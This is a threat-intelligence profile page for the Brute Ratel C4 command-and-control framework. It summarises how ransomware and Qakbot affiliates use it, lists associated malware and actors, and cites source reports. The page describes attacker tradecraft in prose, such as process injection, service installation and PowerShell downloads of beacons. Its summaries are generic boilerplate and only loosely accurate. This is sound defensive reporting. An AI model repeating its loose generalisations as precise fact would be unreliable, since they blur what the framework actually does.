Brute Ratel

Malware Profile Updated 13 days ago
Download STIX
Preview STIX
Brute Ratel is a malicious software (malware) that has been utilized by cybercriminals to exploit and damage computer systems. This malware can infiltrate systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside a system, Brute Ratel can steal personal information, disrupt operations, or even hold data hostage for ransom. The malware operates as a beacon to command and control servers, providing cybercriminals with remote access capabilities similar to the pentesting suite Cobalt Strike. The SharpHound utility is executed via Brute Ratel in an injected svchost.exe process to output JSON files. These files are then ingested into BloodHound, describing various aspects of Active Directory Organizational Units, such as Group Policies, Domains, User Groups, Computers, and Users. ALPHV Blackcat affiliates have claimed to use Brute Ratel C4 and Cobalt Strike as beacons to command and control servers. Additionally, they employ the open-source adversary-in-the-middle attack framework Evilginx2, which enables them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. Qakbot-affiliated actors have increasingly used Brute Ratel as a vehicle to drop other malware, most notably Cobalt Strike and a range of ransomware. In one instance, attackers installed the Brute Ratel binary as a Windows service named "wewe" on at least one affected machine. They also used PowerShell commands to download and execute Cobalt Strike beacons on some machines, further demonstrating the versatile and damaging nature of this malware.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Cobalt Strike
Ransomware
Malware
Windows
Exploit
Implant
Payload
Apt
Spearphishing
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
QakBotUnspecified
5
Qakbot is a type of malware, or malicious software, designed to exploit and damage computer systems. It infiltrates systems through suspicious downloads, emails, or websites and can steal personal information, disrupt operations, or hold data for ransom. Qakbot is among several malware families buil
Black BastaUnspecified
5
Black Basta is a prolific malware, specifically a Ransomware-as-a-Service (RaaS) operator, originating from Russia. It is believed to be an offshoot of the notorious Conti ransomware group, which ceased operations just prior to Black Basta's emergence. The malware uses popular initial access techniq
PlugXUnspecified
2
PlugX is a sophisticated malware predominantly used by various Chinese Advanced Persistent Threat (APT) groups like PKPLUG, but also found in the hands of non-Chinese threat actors due to its circulation in underground hacking communities. This modular backdoor has evolved through different stages,
QbotUnspecified
2
Qbot, also known as Qakbot or Pinkslipbot, is a modular information-stealing malware that emerged in 2007 as a banking trojan. Over time, it has evolved into an advanced strain of malware used by multiple cybercriminal groups to prepare compromised networks for ransomware infestations. The attack ch
ContiUnspecified
2
Conti is a malware program known for its disruptive capabilities, including stealing personal information and holding data hostage for ransom. It gained notoriety as part of the arsenal of ITG23, a cybercrime group that used it in conjunction with other malicious software like Trickbot, BazarLoader,
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
AlphvUnspecified
2
Alphv, also known as BlackCat, is a notorious threat actor that emerged in December 2021. The group has been responsible for numerous high-profile cyberattacks, including those against Clarion, a global manufacturer of audio and video equipment for cars; Morrison Community Hospital, from which they
The DukesUnspecified
2
The Dukes, also known as APT29, Cozy Bear, Midnight Blizzard, BlueBravo, and Nobelium, is a cyber espionage group believed to be affiliated with the Russian Foreign Intelligence Service (SVR). The group first came into prominence in 2015 when an FBI agent alerted the Democratic National Committee (D
SandwormUnspecified
2
Sandworm is a Russia-linked Advanced Persistent Threat (APT) group, recognized for its malicious cyber activities. The group has been associated with several high-profile attacks, including compromising 11 Ukrainian telecommunications providers and deploying the previously unknown Kapeka backdoor. S
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Source Document References
Information about the Brute Ratel Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
CERT-EU
10 months ago
First Known Targeted OSS Supply Chain Attacks Against the Banking Sector
InfoSecurity-magazine
10 months ago
Novel Open Source Supply Chain Attacks Target Banking Sector
CERT-EU
8 months ago
Identification and Disruption of QakBot Infrastructure - KizzMyAnthia.com
CERT-EU
3 months ago
US healthcare alerted against BlackCat amid targeted attacks | #ransomware | #cybercrime | National Cyber Security Consulting
BankInfoSecurity
a year ago
Royal Ransomware Group Builds Its Own Malware Loader
CISA
9 months ago
Identification and Disruption of QakBot Infrastructure | CISA
CERT-EU
3 months ago
US Government Warns Healthcare is Biggest Target for BlackCat Affiliat
MITRE
5 months ago
BlackCat ransomware attacks not merely a byproduct of bad luck
Yori
a year ago
Hunting Cyber Evil Ratels: From the targeted attacks to the widespread usage of Brute Ratel - Yoroi
DARKReading
5 months ago
Qakbot Sightings Confirm Law Enforcement Takedown Was Only a Setback
DARKReading
a year ago
APT41 Taps Google Red Teaming Tool in Targeted Info-Stealing Attacks
DARKReading
a year ago
Exfiltrator-22 Post-Exploitation Toolkit Nips At Cobalt Strike's Heels
Canadian Centre for Cyber Security
a year ago
Ongoing reports of Qakbot malware incidents – Update 1 - Canadian Centre for Cyber Security
CERT-EU
10 months ago
Banking sector targeted in novel OSS supply chain attacks
MITRE
5 months ago
Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike
CERT-EU
a year ago
Attackers reduce complexity to catch more potential victims | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #ransomware - National Cyber Security
Fortinet
10 months ago
Ransomware Roundup - Black Basta | FortiGuard Labs
DARKReading
a year ago
ESET APT Report: Attacks by China-, North Korea-, and Iran-aligned Threat Actors; Russia Eyes Ukraine and the EU
Recorded Future
a year ago
2022 Adversary Infrastructure Report
Securityaffairs
10 months ago
Experts warn of OSS supply chain attacks on the banking sector